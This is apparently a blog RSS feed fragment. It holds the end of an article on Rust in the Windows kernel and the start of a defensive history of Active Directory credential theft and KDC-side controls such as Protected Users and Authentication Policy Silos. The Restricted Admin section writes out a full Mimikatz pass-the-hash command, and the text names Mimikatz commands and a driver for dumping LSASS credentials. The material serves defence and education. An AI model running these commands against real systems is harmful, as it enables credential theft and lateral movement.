&lt;p&gt;Strategic frame: treat Rust adoption as a long-term policy lever, not a near-term mitigation. For the next five years, assume the kernel is still 95%+ C and C++. Treat in-kernel Rust as incremental risk reduction at the modules where it lands -- the GDI region engine, the EMF parser, future surfaces around metafile and graphics parsing, possibly virtualization plumbing. Treat the unsafe-FFI boundary as the audit frontier; concentrate fuzzing, code review, and CodeQL-Rust analysis there. Rely on the existing mitigations stack -- HVCI, CFG, XFG, CET, Driver Verifier, WDAC -- as defence-in-depth that Rust does &lt;em&gt;not&lt;/em&gt; replace [@learn-cfg; @learn-gs; @learn-dep]. Plan for the panic-as-BSOD class as the new DoS surface, and architect monitoring (event-log mining for &lt;code&gt;SYSTEM_SERVICE_EXCEPTION&lt;/code&gt; rates, fleet telemetry for Rust-panic markers) accordingly.&lt;/p&gt;
&lt;h3&gt;10.4 For security researchers fuzzing the Rust kernel surface&lt;/h3&gt;
&lt;p&gt;Check Point&apos;s methodology is the public reference [@checkpoint-dof]; the productive bug classes and the WinAFL + WinAFL-Pet + BugId + MemProcFS pipeline are described in §10.1 above. Two items are specific to the Rust kernel surface and worth adding here. First, integrate CodeQL&apos;s Rust query pack once 2.22.1+ ships in your build pipeline -- only 2.21.4 is WHCP-validated today [@register-2025-09-04]. Second, the empirical companion-CVE pattern: the same Check Point campaign that surfaced &quot;Denial of Fuzzing&quot; also produced several C/C++ GDI vulnerabilities (CVE-2025-30388, CVE-2025-53766, CVE-2025-47984), which suggests there is more to find in the GDI region of Win32k regardless of language [@checkpoint-drawn].&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. Microsoft&apos;s stated policy is &quot;memory-safe by default for newly written code&quot; plus targeted rewrites of high-blast-radius modules. The legacy C and C++ kernel is not being rewritten on any announced timeline. Galen Hunt&apos;s &quot;1 engineer, 1 month, 1 million lines of code&quot; framing is a research target inside Microsoft&apos;s CoreAI group; Frank X. Shaw, head of Microsoft&apos;s communications, confirmed within days of the December 2025 LinkedIn post that the company has no plan to rewrite Windows 11 using AI [@windowslatest-galen; @infoworld-not-rewriting; @register-2025-12-24].

No. Rust eliminates the memory-corruption CVE class *in the modules it covers*. It does not eliminate logic bugs, race conditions, or denial-of-service vulnerabilities. Check Point Research&apos;s &quot;Denial of Fuzzing&quot; disclosure -- patched in KB5058499 on 28 May 2025 -- is the dispositive case. Rust correctly detected an out-of-bounds access in `region_from_path_mut()` inside `win32kbase_rs.sys`; because `panic = &quot;abort&quot;` is mandatory in `no_std` kernel binaries, the response was a system-wide BSOD rather than a remote code execution [@checkpoint-dof; @kb5058499].

No. DWriteCore is user-mode code distributed through the Windows App SDK 1.2 and above. The kernel-mode Rust binary is `win32kbase_rs.sys`. The two are often conflated in secondary coverage because David Weston announced both at BlueHat IL 2023 on the same slide deck. DWriteCore is roughly 152,000 lines of Rust plus 96,000 lines of C++; `win32kbase_rs.sys` is the in-kernel piece, originally about 36,000 lines [@register-2023-04-27].

No. The public Microsoft GitHub repository is `microsoft/windows-drivers-rs`. The crate suite contains six crates named `wdk`, `wdk-sys`, `wdk-alloc`, `wdk-build`, `wdk-panic`, and `wdk-macros`. The Cargo subcommand is `cargo-wdk`. There is no &quot;WDR&quot; abbreviation in the official Microsoft naming. The companion samples repository is `microsoft/Windows-rust-driver-samples` [@windows-drivers-rs; @windows-rust-samples].

No. The originating talk was Matt Miller&apos;s at BlueHat IL in early February 2019, titled *Trends, Challenges, and Shifts in Software Vulnerability Mitigation*. The deck is in the `microsoft/MSRC-Security-Research` GitHub repository. Weston and Mark Russinovich later operationalised the figure in their own talks. The Microsoft Security Response Center re-stated it in plain prose in two essays in July 2019 [@miller-bluehat-2019; @msrc-proactive-2019; @msrc-safer-2019; @infoq-mitigating].

No. OpenVMM is a separate modular Rust VMM whose primary 2026 production deployment is as the OpenHCL paravisor for AMD SEV-SNP and Intel TDX confidential virtual machines [@openvmm-github; @phoronix-openhcl]. Hyperlight is the Azure-side production Rust micro-VMM with sub-2-millisecond cold-start times. The in-Windows Hyper-V Virtualisation Service Provider (VSP) front-end&apos;s Rust status has not been publicly announced; that is Open Problem P6 in the article&apos;s frontier section [@newstack-russinovich].
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;rust-in-the-windows-kernel-2026-field-guide&quot; keyTerms={[
  { term: &quot;win32kbase_rs.sys&quot;, definition: &quot;The first Rust-implemented Windows kernel binary; contains the Win32k GDI region/shape engine and, by 2025, parts of the EMF/EMF+ metafile parser.&quot; },
  { term: &quot;panic = abort&quot;, definition: &quot;The Rust compilation profile that converts a panic into an immediate abort rather than stack unwinding; mandatory for no_std kernel binaries.&quot; },
  { term: &quot;no_std&quot;, definition: &quot;Rust crate attribute opting out of the standard library; required for kernel binaries because std assumes OS services the kernel itself provides.&quot; },
  { term: &quot;GlobalAlloc&quot;, definition: &quot;The Rust trait for the global memory allocator; in kernel Rust it is implemented by wdk-alloc over ExAllocatePool2/ExFreePoolWithTag.&quot; },
  { term: &quot;FFI&quot;, definition: &quot;Foreign Function Interface; the ABI-crossing mechanism by which Rust calls C kernel functions. Every FFI call in kernel Rust is an unsafe block.&quot; },
  { term: &quot;CFI&quot;, definition: &quot;Control-Flow Integrity; the mitigation family (CFG, XFG, CET) that defends the control-flow graph; by construction blind to data-only attacks.&quot; },
  { term: &quot;DOP&quot;, definition: &quot;Data-Oriented Programming; Hu et al. (IEEE S&amp;amp;P 2016) proved data-only attacks are Turing-complete and invisible to every CFI variant.&quot; },
  { term: &quot;IRQL&quot;, definition: &quot;Interrupt Request Level; the Windows kernel per-CPU priority. At IRQL &amp;gt;= DISPATCH_LEVEL a panic has nowhere to go except the system bugcheck.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;The article&apos;s smallest claim is also its largest. Rust is in the Windows kernel today, in production, with a real binary you can list at a real path. The article&apos;s largest claim is its smallest. The realistic ten-year shape is not a Windows rewrite; it is a policy that compounds, over decades, across modules whose authors choose Rust on first contact. The most defended forward posture combines Rust for new code, targeted rewrites of high-blast-radius modules, CHERI-class hardware capabilities where silicon supports them, and the existing mitigations stack as the patient defence-in-depth backstop. Each piece is partial. The combination is the answer to the 70-percent figure that Matt Miller stood up and named in Tel Aviv in early February 2019.&lt;/p&gt;
&lt;p&gt;Now go check &lt;code&gt;C:\Windows\System32\win32kbase_rs.sys&lt;/code&gt;. It is there.&lt;/p&gt;
</content:encoded><category>rust</category><category>windows-kernel</category><category>memory-safety</category><category>win32k</category><category>msrc</category><category>cve-mitigations</category><category>secure-future-initiative</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Who is allowed to log in where? The KDC-side answer to credential theft in Active Directory</title><link>https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/</link><guid isPermaLink="true">https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/</guid><description>A 28-year arc from Paul Ashton&apos;s pass-the-hash demonstration to the 2026 reference deployment of Tiering, Protected Users, and Authentication Policy Silos.</description><pubDate>Sat, 23 May 2026 00:00:00 GMT</pubDate><content:encoded>
Every NTLM and Kerberos credential-theft chain reduces to one operational question: which accounts will the directory authenticate, from which machines, with what credential materials? Active Directory&apos;s KDC-side answer arrived in a single October 2013 release -- the tier model (policy intent), the Protected Users security group (a non-configurable credential-restriction switch), and Authentication Policy Silos (KDC-enforced TGT-acceptance rules). It has since acquired residual closures (the November 2021 PAC hardening, the May 2022 PKINIT strong-mapping) and a cloud counterpart (Entra Conditional Access, a second independent enforcement plane). This article traces the 28-year arc from Paul Ashton&apos;s April 1997 pass-the-hash post to the 2026 reference deployment, names the four residuals the KDC cannot close by construction, and gives a six-phase playbook for putting the three controls into production this quarter.
&lt;h2&gt;1. Two accounts, one TGT, every domain controller&lt;/h2&gt;
&lt;p&gt;On a Tuesday morning in April 1997, an independent researcher named Paul Ashton posted to the NTBugtraq mailing list. His patched Samba &lt;code&gt;smbclient&lt;/code&gt; did not accept a password. It accepted the hash, and the file server gave it everything [@exploit-db-19197]. The directory had no answer for the next sixteen years.&lt;/p&gt;
&lt;p&gt;Skip forward to today. A domain admin&apos;s laptop is compromised by a phishing payload. The attacker runs Mimikatz against &lt;code&gt;lsass.exe&lt;/code&gt;, recovers a Kerberos ticket-granting ticket for the admin account, and from that TGT every domain controller in the forest is reachable. The detection engineer who pulls the incident report knows exactly what happened. The architect on the other side of the table knows the answer was never going to come from the workstation, from the smartcard, or from the RDP client. It had to come from the directory.&lt;/p&gt;
&lt;p&gt;This is what every credential-theft chain reduces to: a question about which accounts the directory will authenticate, from which machines, with which credential materials, for how long, and to whom they may delegate. Until October 2013, Active Directory had no place to answer that question. It had access-control lists, group memberships, and an AdminSDHolder template that re-stamped privileges every hour [@metcalf-p1906]. None of those mechanisms could refuse to issue a stolen credential, because on the wire a stolen credential is identical to a legitimate one.&lt;/p&gt;
&lt;p&gt;Windows Server 2012 R2 changed that on October 18, 2013 [@save-date-blog]. In a single release, the directory acquired three controls that compose into one operational answer. The &lt;strong&gt;tier model&lt;/strong&gt; names which accounts and machines belong to which control plane: T0 holds the domain controllers and the systems that manage them, T1 holds servers and business data, T2 holds workstations [@ms-eam]. The &lt;strong&gt;Protected Users security group&lt;/strong&gt; (well-known RID 525) imposes a non-configurable credential-restriction set: no &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt;, no DES or RC4 in Kerberos, no delegation, no cached offline-sign-in verifier, and a four-hour non-renewable TGT cap [@ms-pu-current]. &lt;strong&gt;Authentication Policies&lt;/strong&gt; and &lt;strong&gt;Authentication Policy Silos&lt;/strong&gt; are directory objects that tell the Key Distribution Center (KDC) which source machines may authenticate which accounts, at AS-REQ time, before any TGT exists to be stolen [@ms-aps].&lt;/p&gt;
&lt;p&gt;If you arrived here from the earlier posts in this series: this is the operational counterpart to the NTLM relay story, to the Kerberoasting story, and to the Credential Guard story. Silos are how the KDC says no; Credential Guard is how the host says no; Conditional Access is how the cloud says no. The three planes are independent and they compose.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The on-prem AD KDC, keyed on directory state read at issuance time, is the operational answer to credential-theft attack chains. The directory decides which accounts may authenticate, from which machines, with which credential materials, for how long, and to whom they may delegate. The three controls -- tier model, Protected Users, Authentication Policy Silos -- compose into that decision.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The rest of this article pays off the question Ashton&apos;s 1997 post raises. Why did the directory have no answer for sixteen years? What changed in October 2013 that the pre-2013 controls could not deliver? What does a working 2026 deployment look like, and what does it still leave open?&lt;/p&gt;
&lt;h2&gt;2. Why the directory had no answer for a decade&lt;/h2&gt;
&lt;p&gt;Ashton&apos;s 1997 demonstration was not subtle. The NT hash is, on the wire, the credential. Windows NT 4&apos;s challenge-response authentication used the LanMan or NT one-way function output as the long-term key; anyone who could read that value from the SAM, from a network capture, or from &lt;code&gt;lsadump&lt;/code&gt; could authenticate as the principal without ever knowing the password [@exploit-db-19197]. Wikipedia&apos;s secondary anchor attributes the first public demonstration to Ashton and dates it to 1997 [@wiki-pth]; the Exploit-DB mirror of the original patch preserves file modification timestamps that narrow the day to Tuesday, April 8, 1997 [@exploit-db-19197].&lt;/p&gt;

A credential-theft technique that uses an account&apos;s NT one-way function output (the NT hash) to authenticate, instead of the plaintext password. Because the Windows NTLM protocol uses the hash itself as the long-term key, an attacker who reads the hash from memory or from disk can authenticate as the account without ever cracking the password.
&lt;p&gt;For more than a decade after Ashton&apos;s post, Microsoft&apos;s institutional position was that this was a protocol legacy, not a vulnerability. The reasoning was internally consistent: the hash IS the long-term key in the protocol&apos;s design; refusing to honour it would break every existing Windows client. The 2008 Pass-the-Hash Toolkit, written by Hernan Ochoa [@wiki-pth], turned the academic demonstration into a single-binary Windows-native tool that read NT hashes from &lt;code&gt;lsass.exe&lt;/code&gt; and injected them into a running logon session [@wiki-pth]. Microsoft&apos;s &lt;em&gt;Privileged access strategy&lt;/em&gt; page now records the 2008 release of the Pass-the-Hash Toolkit as the proximate cause of the escalation in attacker tooling [@ms-paw-strategy].&lt;/p&gt;
&lt;p&gt;Pre-2012, Microsoft&apos;s public posture toward credential-extraction tooling was, in Benjamin Delpy&apos;s own retelling, &quot;this is not a vulnerability.&quot; The Wired profile records the response he received when he disclosed Mimikatz to Microsoft in 2011 [@wired-mimikatz]. That posture is what made the 2012 white paper a turning point: Microsoft committed to treating the attack class as a vulnerability that had to be mitigated by a Microsoft control, not merely contained by operator discipline.&lt;/p&gt;
&lt;p&gt;The escalation that finally broke the institutional posture was Benjamin Delpy&apos;s Mimikatz, released publicly in May 2011 (closed source) on his personal blog [@mimikatz-blog]. Wired&apos;s biographical piece records the date verbatim: &quot;He released it publicly in May 2011, but as a closed source program&quot; [@wired-mimikatz]. The GitHub repository at &lt;code&gt;github.com/gentilkiwi/mimikatz&lt;/code&gt; opened in April 2014; the &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; command on a SYSTEM-level shell printed plaintext passwords, NT hashes, and Kerberos session keys directly from &lt;code&gt;lsass.exe&lt;/code&gt; [@mimikatz-repo]. Within twenty-four months it was the default post-exploitation credential dumper in every public AD attack-and-defence talk [@metcalf-p1738][@wired-mimikatz].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s first institutional acknowledgement arrived in December 2012 as &lt;em&gt;Mitigating Pass-the-Hash, Version 1&lt;/em&gt;. The canonical Microsoft Download Center URL for that version has not survived the company&apos;s reorganisations and now returns HTTP 404; the document is preserved through references inside its successor, the 2014 Version 2 paper, which is still hosted [@pth-v2-pdf]. Version 2 introduces tiered administrative segmentation as a deployment shape and is unambiguous about why the previous decade of mitigations had not worked.&lt;/p&gt;

Pass-the-Hash and similar credential theft attacks are 100% successful when an attacker gains administrative privileges on a computer, because once a computer is compromised, the attacker can read any credential stored on that computer. -- Microsoft, *Mitigating Pass-the-Hash, Version 2* (2014) [@pth-v2-pdf]
&lt;p&gt;That sentence is the institutional pivot. It moves the framing from &quot;protocol feature, defend the host&quot; to &quot;credentials, once stolen, win.&quot; The defence cannot live in the host, because the host is where the attacker has already won. It also cannot live in the ACL, because the ACL evaluates the principal that is authenticating, and the stolen credential authenticates as the legitimate principal. If access-control lists cannot stop a stolen credential, what can?&lt;/p&gt;
&lt;h2&gt;3. Five generations of pre-2013 controls and why each one failed&lt;/h2&gt;
&lt;p&gt;Between 1997 and 2013, operators tried five distinct families of controls. Each targeted a different part of the stack. Each failed in the same structural way.&lt;/p&gt;
&lt;p&gt;The first family was &lt;strong&gt;operational discipline&lt;/strong&gt;: give every administrator two accounts, &lt;code&gt;alice&lt;/code&gt; for daily work and &lt;code&gt;alice.da&lt;/code&gt; for domain-administrative work, and trust her not to use the privileged identity from her daily workstation. NT 4 (RTM July 31, 1996) shipped with this as the operating model [@wiki-nt4]. As a control it is a procedure, not an enforcement: there is no directory mechanism that prevents &lt;code&gt;alice.da&lt;/code&gt; from interactively logging on to a tier-2 workstation. The Microsoft 2014 paper named the failure mode plainly: once &lt;code&gt;alice.da&lt;/code&gt; runs anywhere an attacker also runs, the credential material sits in that machine&apos;s LSASS and is replayable forest-wide [@pth-v2-pdf].&lt;/p&gt;
&lt;p&gt;The second family was &lt;strong&gt;directory-ACL hardening&lt;/strong&gt;. AdminSDHolder is an object under &lt;code&gt;CN=System&lt;/code&gt; in the directory that stores a template security descriptor. A background task called SDProp runs every 60 minutes on the PDC emulator and re-stamps that ACL onto every account with &lt;code&gt;adminCount=1&lt;/code&gt; -- Domain Admins, Enterprise Admins, Schema Admins, and the rest of the protected groups [@metcalf-p1906]. The intent is to prevent ACL drift: a helpdesk operator&apos;s misconfigured permission cannot weaken Domain Admin protections for more than an hour. The mechanism survives in modern AD, but its original &lt;em&gt;threat-model framing&lt;/em&gt; as a pass-the-hash mitigation is dead. ACLs evaluate the principal; a stolen credential authenticates as the legitimate principal. Worse, Sean Metcalf&apos;s &lt;em&gt;Sneaky Active Directory Persistence #15&lt;/em&gt; documents the inverse abuse: AdminSDHolder is not protected by AdminSDHolder, so an attacker who writes a Full-Control ACE into it once gets that ACE propagated across every protected member within sixty minutes [@metcalf-p1906].&lt;/p&gt;

`CN=AdminSDHolder,CN=System,DC=...` stores a template security descriptor. The SDProp (Security Descriptor propagator) task runs every 60 minutes on the PDC emulator and copies that ACL onto every member of the protected groups -- objects with `adminCount=1`. The mechanism prevents ACL drift on privileged accounts but does not stop credential theft.
&lt;p&gt;The third family was &lt;strong&gt;smartcard-required admin accounts&lt;/strong&gt;. Setting the &lt;code&gt;SMARTCARD_REQUIRED&lt;/code&gt; flag (UAC bit &lt;code&gt;0x40000&lt;/code&gt;) on a privileged account causes the KDC to refuse any AS-REQ that is not a PKINIT request -- the user must present a certificate chain rooted in the domain, with the matching private key on a smartcard [@rfc-4556]. The phishing-credential-into-fake-portal vector is closed: the operator does not know a password to type. But the PKINIT exchange produces a derived long-term key that lives on the workstation as a normal NT hash. The 2014 &lt;em&gt;Mitigating Pass-the-Hash&lt;/em&gt; paper is unambiguous in §6: &quot;Smart cards do not protect against the Pass-the-Hash credential theft attack vector. When a smart card is used to log in to a system, the system computes a derived NT hash of the password and stores it on the system&quot; [@pth-v2-pdf]. Mimikatz extracts the derived hash like any other.&lt;/p&gt;

The Public Key Cryptography for Initial Authentication in Kerberos extension, specified in RFC 4556. PKINIT lets a client present a certificate (typically held on a smartcard or a TPM) in its AS-REQ instead of a password-derived pre-authentication blob. The KDC validates the certificate against an account binding and issues a TGT. The resulting long-term key still lives in the host&apos;s LSASS process.
&lt;p&gt;The fourth family was &lt;strong&gt;host-side credential protection&lt;/strong&gt;: LSA Protection (&lt;code&gt;RunAsPPL&lt;/code&gt;), WDigest plaintext disablement, and the &lt;code&gt;TokenLeakDetectDelaySecs&lt;/code&gt; registry setting. LSA Protection runs &lt;code&gt;lsass.exe&lt;/code&gt; as a &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt;, refusing handles with &lt;code&gt;PROCESS_VM_READ&lt;/code&gt; to anything not signed at PPL level [@ms-lsa-prot]. WDigest plaintext disablement (via &lt;code&gt;UseLogonCredential=0&lt;/code&gt;, shipped in KB 2871997 in May 2014) stops the WDigest SSP from caching the user&apos;s plaintext password [@kb-2871997]. Both moved the bar; neither closed the attack. PPL is enforced by the kernel; on pre-VBS Windows an attacker with a signed kernel driver clears the protection bit, and Mimikatz ships &lt;code&gt;mimidrv.sys&lt;/code&gt; for exactly this purpose [@mimikatz-repo] (on modern hardware-rooted HVCI/VBS, the VTL1 secure kernel closes the signed-driver bypass, but the discussion then moves to where the §6 Credential Guard primitive lives [@ms-cred-guard]). WDigest disablement removes plaintext from memory but does nothing to the NT hash or to Kerberos session keys, which are the actually-replayable material.&lt;/p&gt;
&lt;p&gt;The fifth family was &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/rdp-authentication-26-years/&quot; rel=&quot;noopener&quot;&gt;Restricted Admin Mode for RDP&lt;/a&gt;&lt;/strong&gt;, shipped via the October 14, 2014 revision of KB 2871997 [@kb-2871997]. The intent was to interrupt lateral movement: &lt;code&gt;mstsc /restrictedadmin&lt;/code&gt; causes the RDP client to send a CredSSP-wrapped network logon to the target. The target creates a network-logon token instead of an interactive one, and the user&apos;s NT hash or Kerberos session keys never land on the target [@ms-rcg][@kfalde-restricted-admin]. Within months, Benjamin Delpy demonstrated the inverse: because the RDP client authenticates with the user&apos;s &lt;em&gt;existing&lt;/em&gt; credential material, an attacker on the client can pass a stolen NT hash directly into the RDP session with &lt;code&gt;sekurlsa::pth /user:alice.da /domain:CORP /ntlm:&amp;lt;hash&amp;gt; /run:&quot;mstsc /restrictedadmin&quot;&lt;/code&gt; [@mimikatz-repo]. The defence became the lateral move. Microsoft updated KB 2871997 to acknowledge this, and Restricted Admin is off by default client-side on modern Windows [@kb-2871997].&lt;/p&gt;
&lt;p&gt;Restricted Admin Mode for RDP is the cleanest case in the 28-year arc of a control whose deployment created the inverse of its intent. The mode that protects credentials on the RDP target also enables pass-the-hash &lt;em&gt;into&lt;/em&gt; the RDP target from a compromised client. Microsoft&apos;s response -- disable it on the client side -- is the practical confirmation. This is the strongest argument in the historical record for moving the credential-restriction decision out of the host, the protocol, and the channel, and into the KDC.&lt;/p&gt;

flowchart TD
    Op[&quot;Operator discipline (two-account pattern, 1990s)&quot;] --&amp;gt; Op_x[&quot;Procedure, not enforcement: one mistake compromises the forest&quot;]
    ACL[&quot;AdminSDHolder + SDProp (NT 4 / 2000)&quot;] --&amp;gt; ACL_x[&quot;ACLs evaluate the principal, and a stolen credential authenticates as the legitimate principal&quot;]
    SC[&quot;Smartcard-required (Server 2003+)&quot;] --&amp;gt; SC_x[&quot;PKINIT changes only the AS-REQ method, and the derived NT hash still lives in LSASS&quot;]
    HS[&quot;LSA Protection / WDigest off (2013-14)&quot;] --&amp;gt; HS_x[&quot;PPL bypassable by a signed kernel driver, with NT hash and Kerberos keys still in memory&quot;]
    RA[&quot;Restricted Admin Mode for RDP (Oct 2014)&quot;] --&amp;gt; RA_x[&quot;Inverse-of-intent: enables pass-the-hash via RDP from the compromised client&quot;]
    Op_x --&amp;gt; Sink[&quot;All five enforce in a layer that does not see the directory&apos;s authoritative view of who-may-issue-credentials-from-where&quot;]
    ACL_x --&amp;gt; Sink
    SC_x --&amp;gt; Sink
    HS_x --&amp;gt; Sink
    RA_x --&amp;gt; Sink
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A credential, once usable, is on the wire identical to the legitimate one. Every Generation 1-5 control fails because it enforces in a layer that cannot tell the two apart at the point where it tries to decide. The fix is to refuse to issue or to delegate the credential in the first place -- a decision that has to move one layer up, to the KDC, keyed on directory state.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the operator cannot be trusted, the ACL cannot enforce, the smartcard-derived hash still lives in LSASS, the host-side protections can be bypassed by anyone with privilege to deploy them, and the RDP mode meant to interrupt lateral movement enables it -- where does the decision have to move?&lt;/p&gt;
&lt;h2&gt;4. October 18, 2013: the directory acquires a vocabulary&lt;/h2&gt;
&lt;p&gt;The Microsoft Server team&apos;s August 14, 2013 save-the-date blog post fixed the General Availability of Windows Server 2012 R2 for October 18, 2013 [@save-date-blog]. In that single release, three new directory-side primitives appeared: the &lt;strong&gt;Protected Users&lt;/strong&gt; built-in security group with well-known RID 525, the &lt;strong&gt;&lt;code&gt;msDS-AuthNPolicy&lt;/code&gt;&lt;/strong&gt; AD object class for Authentication Policies, and the &lt;strong&gt;&lt;code&gt;msDS-AuthNPolicySilo&lt;/code&gt;&lt;/strong&gt; AD object class for Authentication Policy Silos [@ms-pu-legacy]. The legacy Windows Server 2012 R2 TechNet documentation, preserved on Microsoft Learn, states the introduction verbatim: &quot;This group was introduced in Windows Server 2012 R2&quot; [@ms-pu-legacy]. The architectural decision visible in the wire format: the KDC, not the application, now decides whether a TGT may be issued, what its lifetime will be, and what delegation operations on it will succeed.&lt;/p&gt;

The Kerberos authentication service, specified in RFC 4120. The KDC handles AS-REQ (issuing a Ticket-Granting Ticket from a long-term key) and TGS-REQ (issuing a service ticket from a TGT). On Windows domains, every domain controller runs a KDC; the KDC reads its policy state from the directory at request time, which is the property the Server 2012 R2 controls exploit [@rfc-4120].

A Microsoft authorisation-data overlay carried inside Kerberos TGTs and service tickets, specified in [MS-PAC]. The PAC&apos;s `PAC_LOGON_INFO` buffer contains the user&apos;s SID, primary-group SID, and a `GroupIds` array of well-known group memberships. Protected Users membership is encoded as RID 525 inside that array. There is no separate Protected Users flag bit [@ms-pac].
&lt;p&gt;The detail that matters: there is no dedicated &quot;Protected Users bit&quot; in the PAC. The encoding is the well-known group SID &lt;code&gt;S-1-5-21-&amp;lt;domain&amp;gt;-525&lt;/code&gt; carried in &lt;code&gt;PAC_LOGON_INFO.GroupIds&lt;/code&gt; ([MS-PAC] §2.5) [@ms-pac][@ms-pu-legacy]. The KDC reads that array at AS-REQ and TGS-REQ time the same way it reads it for every other group; what changes is the behaviour the KDC takes when it sees RID 525.&lt;/p&gt;
&lt;p&gt;The down-level half of the shipment arrived seven months later. On May 13, 2014, Microsoft Security Advisory KB 2871997 backported the &lt;em&gt;client-side honoring&lt;/em&gt; of Protected Users and Authentication Policies to Windows 7, Windows 8, Server 2008 R2, and Server 2012 [@kb-2871997]. KB 2871997 is not the introduction of Protected Users. It is the down-level backport that closed the long-tail Silo-bypass class an enterprise would hit if its 2014-era fleet could not honour the new restriction list. Five months later, the October 14, 2014 revision of the same KB shipped Restricted Admin Mode for RDP -- the mode §3 already taught the reader to treat as a cautionary tale.&lt;/p&gt;
&lt;p&gt;The version-mismatch story matters for the operator who finds a 2014 KB cited as the &quot;introduction&quot; of Protected Users in older blog posts. It is not. The introduction is Server 2012 R2 GA on October 18, 2013; the backport is KB 2871997 on May 13, 2014. The legacy Microsoft Learn page records the introduction date plainly [@ms-pu-legacy].&lt;/p&gt;
&lt;p&gt;Microsoft followed the primitive with a deployment shape. The &lt;em&gt;Securing Privileged Access&lt;/em&gt; reference material, originally published on TechNet circa 2014-2015 and preserved on Microsoft Learn at the &lt;code&gt;privileged-access-workstations&lt;/code&gt; root [@ms-paw-root], codified the &lt;strong&gt;clean-source principle&lt;/strong&gt;: a higher-tier secret must never be exposed to a lower-tier host. T0 holds domain controllers, the PKI root, the identity-sync infrastructure, and the DC backup system. T1 holds servers and business data. T2 holds workstations [@ms-eam]. T0 credentials never authenticate to T1 or T2; T1 credentials never authenticate to T2. The Privileged Access Workstation (PAW) is the dedicated source machine for T0 administration. Server 2012 R2 gave operators the &lt;em&gt;primitives&lt;/em&gt;; SPA gave them the &lt;em&gt;shape&lt;/em&gt;.&lt;/p&gt;

flowchart LR
    A[&quot;Apr 8, 1997: Paul Ashton, NTBugtraq -- hash IS the credential&quot;] --&amp;gt; B[&quot;2008: Hernan Ochoa, Pass-the-Hash Toolkit&quot;]
    B --&amp;gt; C[&quot;May 2011: Benjamin Delpy, Mimikatz public release&quot;]
    C --&amp;gt; D[&quot;Dec 2012: Microsoft, Mitigating Pass-the-Hash v1&quot;]
    D --&amp;gt; E[&quot;Oct 18, 2013: Windows Server 2012 R2 GA -- Protected Users, Authentication Policies, Silos&quot;]
    E --&amp;gt; F[&quot;May 13, 2014: KB 2871997 down-level backport&quot;]
    F --&amp;gt; G[&quot;Oct 14, 2014: KB 2871997 adds Restricted Admin RDP&quot;]
    G --&amp;gt; H[&quot;2014-2015: Securing Privileged Access reference material&quot;]
    H --&amp;gt;     I[&quot;Dec 15, 2020: ESAE retired, Enterprise Access Model begins&quot;]
    I --&amp;gt; J[&quot;Nov 9, 2021: KB 5008380 PAC hardening&quot;]
    J --&amp;gt; K[&quot;May 10, 2022: KB 5014754 PKINIT strong mapping&quot;]
    K --&amp;gt; L[&quot;Feb 11, 2025: KB 5014754 Full Enforcement default&quot;]
    L --&amp;gt; M[&quot;Sep 9, 2025: KB 5014754 Compatibility-mode revert removed&quot;]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The KDC, not the application, decides whether a TGT may be issued, what its lifetime is, and what delegation operations on it will succeed. The decision is made by reading directory state -- group SID 525 in &lt;code&gt;PAC_LOGON_INFO.GroupIds&lt;/code&gt; for Protected Users, &lt;code&gt;msDS-AssignedAuthNPolicySilo&lt;/code&gt; and &lt;code&gt;msDS-AssignedAuthNPolicy&lt;/code&gt; for Silo and Policy bindings -- at request time. This is the architectural pivot. The credential-on-the-wire identity property no longer matters, because the credential never gets issued in the first place to be stolen.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three controls, one ship. But how do they compose, exactly -- which decision does the KDC actually make at AS-REQ time, what does it read from the directory, and what does it refuse?&lt;/p&gt;
&lt;h2&gt;5. How the three controls compose: a mechanism walkthrough&lt;/h2&gt;
&lt;p&gt;If you have time to read only one section of this article, read this one. The Server 2012 R2 controls compose into a precise decision the KDC makes at AS-REQ and TGS-REQ time. The mechanism has four moving parts.&lt;/p&gt;
&lt;h3&gt;5.1 The tier model as policy intent&lt;/h3&gt;
&lt;p&gt;The tier model is policy intent, not enforcement. &lt;strong&gt;Tier 0&lt;/strong&gt; is the control plane: every domain controller, every certificate authority that issues domain-trust certificates, the Microsoft Entra Connect server that synchronises identity to the cloud, and the backup systems that can restore any of those. &lt;strong&gt;Tier 1&lt;/strong&gt; is the management and data plane: servers, business applications, and the database engines that hold the data the organisation actually cares about. &lt;strong&gt;Tier 2&lt;/strong&gt; is the user plane: workstations and the devices users carry [@ms-eam]. The rule that defines the model is the clean-source principle: a higher-tier credential must never authenticate to a lower-tier host, because once it lands in the lower-tier host&apos;s memory it is exfiltrable by anyone with privilege on that host [@ms-paw-strategy]. The tier model says nothing about how the rule is enforced. Protected Users and Authentication Policy Silos are how.&lt;/p&gt;
&lt;h3&gt;5.2 Protected Users: the credential-restriction switch&lt;/h3&gt;
&lt;p&gt;Protected Users is a global security group with well-known RID 525, present in every domain at Domain Functional Level 2012 R2 or later. Membership is encoded as the well-known SID &lt;code&gt;S-1-5-21-&amp;lt;domain&amp;gt;-525&lt;/code&gt; carried in the &lt;code&gt;GroupIds&lt;/code&gt; array of the user&apos;s &lt;code&gt;PAC_LOGON_INFO&lt;/code&gt; ([MS-PAC] §2.5) [@ms-pac][@ms-pu-current]. When the KDC reads RID 525 in that array, it applies a non-configurable restriction set documented on Microsoft Learn [@ms-pu-current]:&lt;/p&gt;
&lt;ol&gt;
